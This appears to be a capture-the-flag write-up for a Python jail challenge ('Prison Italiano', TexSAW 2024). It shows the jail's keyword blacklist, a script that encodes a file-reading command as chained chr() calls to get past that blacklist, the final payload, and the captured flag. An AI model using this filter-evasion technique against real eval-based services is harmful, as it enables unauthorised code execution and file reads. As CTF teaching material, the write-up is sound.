Prison Italiano~
2024-08-08 20:37:52 # Texsaw-CTF-2024

You’ve been locked in the worst prison imaginable: one without any meatballs! To escape the prison, you must read the flag using Python!

nc 3.23.56.243 9011

After playing around with it a bit, and getting various errors, here’s what I got: 

1
2
3
4
5
6
7
8
9
blacklist: import, dir, print, open, ', ", os, sys, _, eval, exec, =, [, ]

prohibited actions:
    function calls without parameters, i.e. '()'

code fragments:
    inp = eval(inp)
    inp = inp.replace("print", "stdout.write")
    out = exec(inp)

The code fragments are the most important here. Notably, the input is evaluated first before it is executed… let’s test if a function like chr() works.

Turns out, it does! That means we can just write every character as a chr(some number), which will allows us to print the file. Here’s a little script that helps us write our payload: 

1
2
3
payload = 'print(open("flag.txt","r").read())'
for i in payload:
    print(f'chr({ord(i)})+', end='')

And here’s our final payload: 

1
chr(112)+chr(114)+chr(105)+chr(110)+chr(116)+chr(40)+chr(111)+chr(112)+chr(101)+chr(110)+chr(40)+chr(34)+chr(102)+chr(108)+chr(97)+chr(103)+chr(46)+chr(116)+chr(120)+chr(116)+chr(34)+chr(44)+chr(34)+chr(114)+chr(34)+chr(41)+chr(46)+chr(114)+chr(101)+chr(97)+chr(100)+chr(40)+chr(41)+chr(41)
texsaw{SP4P3GGY_4ND_M34TBA11S_aa17c6d30ee3942d}
Prev
2024-08-08 20:37:52 # Texsaw-CTF-2024
Next